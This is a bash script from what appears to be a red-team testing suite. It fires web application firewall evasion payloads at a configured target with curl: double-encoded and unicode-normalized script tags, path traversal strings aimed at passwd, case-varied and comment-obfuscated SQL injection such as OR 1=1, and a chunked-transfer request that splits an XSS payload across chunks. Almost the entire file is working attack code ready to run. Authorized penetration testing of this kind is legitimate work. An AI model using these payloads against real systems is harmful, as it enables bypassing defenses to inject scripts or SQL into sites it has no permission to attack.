| 1 | #!/bin/bash |
| 2 | # Advanced WAF evasion - encoding tricks, chunked bypass, unicode normalization |
| 3 | SCRIPT_DIR="$(cd "$(dirname "${BASH_SOURCE[0]}")" && pwd)" |
| 4 | source "$SCRIPT_DIR/../config.sh" |
| 5 | OUT="$OUT/waf_advanced" |
| 6 | mkdir -p "$OUT" |
| 7 | |
| 8 | echo '=== ADVANCED WAF EVASION ===' | tee "$OUT/summary.txt" |
| 9 | |
| 10 | url_encode() { printf '%s' "$1" | python3 -c "import sys,urllib.parse; print(urllib.parse.quote(sys.stdin.read().strip()))"; } |
| 11 | |
| 12 | # Double encoding |
| 13 | echo '--- Double Encoding ---' | tee -a "$OUT/summary.txt" |
| 14 | DOUBLE_ENC=( |
| 15 | '%253cscript%253e' |
| 16 | '%252e%252e%252f' |
| 17 | '%2527 OR 1=1--' |
| 18 | '%252527' |
| 19 | ) |
| 20 | for p in "${DOUBLE_ENC[@]}"; do |
| 21 | resp=$(curl -sk -o /dev/null -w '%{http_code}' --max-time 8 "$TARGET/?q=$p") |
| 22 | echo "[$resp] Double-encoded: $p" | tee -a "$OUT/summary.txt" |
| 23 | done |
| 24 | |
| 25 | # Unicode normalization bypass |
| 26 | echo '' | tee -a "$OUT/summary.txt" |
| 27 | echo '--- Unicode Normalization ---' | tee -a "$OUT/summary.txt" |
| 28 | UNICODE=( |
| 29 | '%EF%BC%9Cscript%EF%BC%9E' |
| 30 | '%u003cscript%u003e' |
| 31 | '\xc0\xaepasswd' |
| 32 | ) |
| 33 | for p in "${UNICODE[@]}"; do |
| 34 | resp=$(curl -sk -o /dev/null -w '%{http_code}' --max-time 8 "$TARGET/?q=$p") |
| 35 | echo "[$resp] Unicode: $p" | tee -a "$OUT/summary.txt" |
| 36 | done |
| 37 | |
| 38 | # Case variation bypass |
| 39 | echo '' | tee -a "$OUT/summary.txt" |
| 40 | echo '--- Case Variation ---' | tee -a "$OUT/summary.txt" |
| 41 | CASES=( |
| 42 | "<SCRIPT>alert(1)</SCRIPT>" |
| 43 | "<ScRiPt>alert(1)</ScRiPt>" |
| 44 | "' Or 1=1--" |
| 45 | "' oR '1'='1" |
| 46 | "SeLeCt * fRoM uSeRs" |
| 47 | ) |
| 48 | for p in "${CASES[@]}"; do |
| 49 | encoded=$(url_encode "$p") |
| 50 | resp=$(curl -sk -o /dev/null -w '%{http_code}' --max-time 8 "$TARGET/?q=$encoded") |
| 51 | echo "[$resp] Case: $p" | tee -a "$OUT/summary.txt" |
| 52 | done |
| 53 | |
| 54 | # Comment injection in SQL |
| 55 | echo '' | tee -a "$OUT/summary.txt" |
| 56 | echo '--- SQL Comment Injection ---' | tee -a "$OUT/summary.txt" |
| 57 | SQL_COMMENTS=( |
| 58 | "1'/**/OR/**/1=1--" |
| 59 | "1'/*!OR*/1=1--" |
| 60 | "1'+OR+1=1--" |
| 61 | "1'%0aOR%0a1=1--" |
| 62 | ) |
| 63 | for p in "${SQL_COMMENTS[@]}"; do |
| 64 | encoded=$(url_encode "$p") |
| 65 | resp=$(curl -sk -o /dev/null -w '%{http_code}' --max-time 8 "$TARGET/?id=$encoded") |
| 66 | echo "[$resp] SQL comment: $p" | tee -a "$OUT/summary.txt" |
| 67 | done |
| 68 | # Note: 1' OR%001=1-- uses a null byte which is invalid in URLs - curl rejects it (000 expected) |
| 69 | echo "[SKIP] SQL comment: 1' OR%001=1-- (null byte in URL โ curl rejects, not a WAF gap)" | tee -a "$OUT/summary.txt" |
| 70 | |
| 71 | # Chunked encoding WAF bypass |
| 72 | echo '' | tee -a "$OUT/summary.txt" |
| 73 | echo '--- Chunked Transfer WAF Bypass ---' | tee -a "$OUT/summary.txt" |
| 74 | resp=$(curl -sk -o /dev/null -w '%{http_code}' --max-time 10 -X POST "$TARGET/" \ |
| 75 | -H 'Transfer-Encoding: chunked' \ |
| 76 | -H 'Content-Type: application/x-www-form-urlencoded' \ |
| 77 | --data-binary $'b\r\n<script>a</\r\nb\r\nscript>\r\n0\r\n\r\n') |
| 78 | echo "[$resp] Chunked XSS split across chunks" | tee -a "$OUT/summary.txt" |
| 79 | |
| 80 | cat "$OUT/summary.txt" |
| 81 |
Script Viewer
Red Team Suite › 12_waf_evasion_advanced.sh